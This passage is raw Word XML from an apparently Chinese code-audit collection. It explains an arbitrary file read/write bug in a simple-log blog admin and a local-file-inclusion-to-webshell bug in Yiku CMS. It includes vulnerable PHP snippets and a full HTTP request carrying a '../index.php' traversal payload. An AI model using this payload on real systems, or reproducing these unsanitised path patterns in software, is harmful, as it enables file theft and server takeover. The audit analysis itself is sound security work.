                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="38" w:firstLine="914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$data=file_get_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contents(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PBBLOG_ROOT.'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/themes/'.$config['template_ name'].'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>/'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file);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="15"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="320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res[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'content']=$data; die($json-&gt;encode($res));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="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3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="321" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'template_file']</w:t>
      </w:r>
      <w:r>
        <w:t>被传给了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">$file </w:t>
      </w:r>
      <w:r>
        <w:t>然后直接字符串拼接进入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="398" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9855" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:50.25pt;width:319.25pt;height:228.2pt;z-index:-367624;mso-position-horizontal-relative:page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($action=='act_set_page')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$data=htmlspecialchars_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decode(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stripslashes($_POST['data'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>]));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$file=$_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POST[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'template_file'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="23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$fp=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@fopen(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PBBLOG_ROOT.'/themes/'.$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config[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'template_name'].'/'.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="3245" w:hanging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$file,"w") or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die(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'can not open file'); flock($fp,LOCK_EX); fwrite($fp,$data); fclose($fp);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="285" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="108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clear_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tpl(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); sys_message('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>页面修改成功</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>','admin.php?act=set_footer&amp;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>file='.$file);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="7"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>中导致读任意文件漏洞的产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>产生写任意文件的地方：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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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同理也是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'template_file']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>被传给了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>然后直接字符串拼接进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> file_get_contents </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中导致写任意文件漏洞的产生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读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9854" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:20pt;width:319.25pt;height:48.9pt;z-index:332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6" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="1117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POST /simple-log/admin/admin.php?act=get_page_data HTTP/1.1 Host: xxx</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="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User-Agent: xxx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853" type="#_x0000_t202" style="width:319.25pt;height:211.9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bookmarkStart w:id="37" w:name="易酷cms本地包含导致getwebshell"/>
                  <w:bookmarkStart w:id="38" w:name="_bookmark18"/>
                  <w:bookmarkEnd w:id="37"/>
                  <w:bookmarkEnd w:id="38"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: application/json, text/javascript, */*</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="1888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Accept-Language: zh-cn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,zh</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="307" w:lineRule="auto"/>
                    <w:ind w:right="1088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Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="4" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="247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Referer: </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId40">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>http://xxx/simple-log/admin/admin.php?act=set_footer&amp;file=bl</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Vrinda"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>og.html</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Content-Length: 23</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="458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Cookie: xxx Connection: keep-alive Pragma: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="253" w:lineRule="exact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Cache-Control: no-cache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微软雅黑"/>
                      <w:sz w:val="23"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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template_file=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..</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>/index.php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3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>易酷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-88"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-88"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>getwebshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Bhunter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="135"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>core\Lib\Action\Home\MyAction.class.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="16"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9852" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:9.75pt;width:319.25pt;height:244.5pt;z-index:340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before="38" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="360" w:right="3457" w:hanging="36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class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MyAction extends HomeAction{ public function index(){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="253" w:lineRule="exact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show(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36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public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function show(){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$id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= !</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>empty($_GET['id'])?$_GET[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'id']:'hot';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48"/>
                    <w:ind w:left="1831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display(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'my_'.trim($id));</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>漏洞点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?&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑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微软雅黑"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="309" w:lineRule="auto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public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function fetch($templateFile='',$charset='',$contentType='text/html',$display=false)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="253" w:lineRule="exact"/>
                    <w:ind w:left="3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9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9851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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="165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GLOBALS[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'_viewStartTime'] = microtime(TRUE); if(null===$templateFile)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="255" w:lineRule="exact"/>
                    <w:ind w:left="1080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使用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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>null</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-65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参数作为模版名直接返回不做任何输出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return ;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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empty($charset))  $charset =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-70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C('DEFAULT_CHARSET');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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网页字符编码</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="285" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="760"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>header(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"Content-Type:".$contentType."; charset=".$charset); header("Cache-control: private");</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="50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支持页面回跳</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1" w:line="304" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="4023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页面缓存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ob_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start(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); ob_implicit_flush(0);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26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!file_exists_case($templateFile))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47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自动定位模板文件</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2335"/>
                    </w:tabs>
                    <w:spacing w:before="48" w:line="285" w:lineRule="auto"/>
                    <w:ind w:right="39" w:firstLine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$templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-31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$this-&gt;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parseTemplateFile(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$templateFile);//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>关键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函数，只有此处对包含模板做了文件处理，我看看下这个函数。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line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="916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$engine = strtolower(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'TMPL_ENGINE_TYPE')); if('php'==$engine) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="255" w:lineRule="exact"/>
                    <w:ind w:left="1080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模板阵列变量分解成为独立变量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extract(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$this-&gt;tVar, EXTR_OVERW</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>RITE);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47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直接载入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PHP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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模板</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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include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$templateFile;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>('think'==$engine &amp;&amp; $this-&gt;checkCache($templateFile)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48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如果是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Think</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-62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模板引擎并且缓存有效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分解变量并载入模板缓存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extract(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$this-&gt;tVar, EXTR_OVERWRITE);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="1080" w:right="3633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//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>载入模版缓存文件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Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="7"/>
                    <w:ind w:right="680"/>
                    <w:jc w:val="center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C(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'CACHE_PATH').md5($templateFile).C('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>TMPL_CACHFILE_SUFFIX');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48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模板文件需要重新编译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支持第三方模板引擎</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47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调用模板引擎解析和输出</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2251"/>
                    </w:tabs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$className</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-22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'Template'.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ucwords(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$engine);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136"/>
        <w:ind w:right="359"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_s9850" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:1in;width:319.25pt;height:554.2pt;z-index:-367528;mso-position-horizontal-relative:page;mso-position-vertical-relative:page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require_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cache(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THINK_PATH.'/Lib/Think/Util/Template/'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className.'.class.php')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1622"/>
                    </w:tabs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$tpl</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>=  new</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-47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$className;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$tpl-&gt;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fetch(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$templateFile,$this-&gt;tVar,$charset);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tabs>
                      <w:tab w:val="left" w:pos="2462"/>
                    </w:tabs>
                    <w:spacing w:before="71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$this-&gt;templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="61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$templateFile;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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获取并清空缓存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$content = ob_get_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clean(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);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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模板内容替换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$content = $this-&gt;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templateContentReplace(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$content);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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布局模板解析</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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$content = $this-&gt;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layout(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$content,$charset,$contentType);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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输出模板文件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return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$this-&gt;output($content,$display);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="3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Vrinda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9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>对包含文件处理：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Vrinda"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="2312" w:hanging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private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function parseTemplateFile($templateFile) { if(''==$templateFile) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="255" w:lineRule="exact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如果模板文件名为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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按照默认规则定位</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left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$templateFile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'TMPL_FILE_NAME');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
